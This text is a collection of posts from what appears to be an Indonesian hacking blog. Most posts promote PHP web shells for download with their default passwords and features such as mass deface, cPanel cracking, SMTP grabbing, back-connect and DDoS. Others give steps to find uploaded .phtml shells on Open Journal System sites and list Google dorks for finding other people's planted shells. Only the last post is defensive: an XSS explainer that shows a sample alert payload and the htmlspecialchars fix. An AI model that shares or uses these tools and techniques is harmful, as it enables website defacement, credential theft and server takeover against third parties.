Oke gan, kali ini ane mau share "Terserah Shell" hasil recoded Mr.x0x , Oke langsung lihat aja Shell nya :) Login Terserah Shell , password default : sukasuka Tampilan Terserah Shell Untuk Shell nya bisa di download disini : https://pastebin.com/DxVJqctB atau https://pastebin.com/Zr0MSMnH Fitur : Mass Deface Mass Delete Config Jumping CPanel Cracker SMTP Grabber Upload Auto Edit User Auto Edit Title Fake Root Zone-H WordPress Auto Deface CFTP Auto Deface KRDP Shell Network Adminer Tool Admin Finder Symlink Priv Auto Deface From N45HT WHOIS CGI Telnet CSRF Online DDoS Shell Scanner Encode / Decode Full Bypass DefacerID Back Connect Semoga Bermanfaat ^_^
Hai.. Kalian yang menggunakan Methode Deface dengan Open Journal System sulit untuk mencari shell kalian yg sudah di upload berbentuk extensi .phtml, Nah kalian bisa menggunakan Tools ini untuk mencari file yang sudah di Upload. Alat : - Xampp (download install dulu kalo belum punya ) - Script php ojs shell finder ( simpan di Dir C:\xampp\php , Beri nama ojs.php ) Cara menggunakan nya Masuk CMD dan Ketikan Perintah - cd c:/xampp/php - php ojs.php site.com nama-file-sm.phtml Contoh Seperti Gambar di Bawah Setelah itu kemudian Enter , dan tunggu saja mungkin agak lama... Nah Ketemu Kan NB : Sebelum registrasi , Cari dulu site yg ada folder files nya , kalau forbidden ada folder nya
Yeah, kali ini gw mau share google dork buat dorking shell yang mungkin masih fresh :v ini kek pengalaman gw dulu, liat dork di google kek gini inurl:"/b374k.php" nahh itu yang gw dapet kebanyakan fake shell, dan kalo di klik menu nya bakal ke http://www.shafou.com/ kan semvak -,-" okelah, langsung liat aja dork nya ^_^ intitle:"IndoXploit" filetype:php intitle:"IndoXploit" intext:"public_html" filetype:php intitle:"IndoXploit" intext:"mass deface" filetype:php intitle:"IndoXploit" intext:"mass delete" filetype:php intitle:"IndoXploit" intext:"jumping" filetype:php intitle:"IndoXploit" intext:"config" filetype:php intitle:"IndoXploit" intext:"config" filetype:php intitle:"IndoXploit" intext:"fake root" filetype:php intitle:"IndoXploit" intext:"auto edit user" filetype:php intitle:"IndoXploit"...
Oke gan, kali ini ane mau share "Noesantara BlackHat Shell" hasil recoded Mr.x0x , Oke langsung lihat aja Shell nya :) Login Noesantara BlackHat Shell , password default : lugiganteng Tampilan Noesantara BlackHat Shell Untuk shell nya bisa di download disini https://pastebin.com/JMNrL6s1 Fitur : Mass Deface Mass Delete Config Jumping CPanel Crack SMTP Grabber Zone-H CGI Telnet network Adminer Fake Root Auto Edit User Auto Edit Title WordPress WordPress Auto Deface WordPress Auto Deface V.2 CPanel/FTP Auto Deface K-RDP Shell DefacerID CSRF Online Back Connect WordPress Brute Hash Identification Symlink Bypass Etc/Passw DB Dump Semoga Bermanfaat ^_^
Home
/
bug
/
Pengertian XSS Dan Cara Mengatasi Bug XSS
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Menurut pengertian diatas XSS merupakan Bug/Vulnerability yang sangat berbahaya karena bug ini bisa digunakan untuk berbagai macam kejahatan seperti :
Menyebarkan Virus.
Mencuri Password/Data sensitif pengguna ( Phising )
Merusak SEO ( Search Engine Optimiziation ) Pada Website.
Bahkan merusak reputasi web anda, apalagi jika web anda adalah web e-commerce.
Pada umumnya XSS ( Cross-Site Scripting ) menyerang pada website melalui :
Forms/Input. Seperti Kolom Pencarian, Komentar, Login, Pendaftaran.
Pada artikel ini saya akan memberitahu bagaimana cara menghindari/mengatasi/memperbaiki bug XSS ( Cross-Site Scripting ) pada PHP. XSS ini disebabkan oleh tidak adanya filter/penyaringan pada kode PHP, berikut contoh kode PHP yang Vulnerable terhadap bug XSS :
<?php $komentar = $_POST['komentar']; // "<script>alert('bug xss');</script>" echo $komentar; // browser memberi sebuah alert/dialog 'bug xss'. ?>
Kode diatas sangat ( telanjang ) sekali menurut saya karena tidak ada filter/konversi pada saat pengambilan data ( echo $komentar; ), pengguna/penyerang bisa saja dengan leluasa menyisipkan sebuah kode jahat berupa javascript/iframe Untuk Memperbaiki bug tersebut maka diperlukan tambahan pada kode PHP nya seperti htmlspecialchars($string, ENT_QUOTES), sehingga kodenya menjadi seperti ini :
<?php $komentar = $_POST['komentar']; // <script>alert('bug xss');</script> echo htmlspecialchars($komentar, ENT_QUOTES); //browser tidak memberi sebuah alert/dialog 'bug xss'. //lantas dikonvert menjadi kode HTML entities. ?>
Kode PHP/browser akan menampilkan output/kode yang telah dimasukkan /sisipkan oleh pengguna/penyerang, tidak mengeksekusinya. Sekarang website PHP anda aman terhadap serangan/bug XSS ini, Semoga bermanfaat. :-)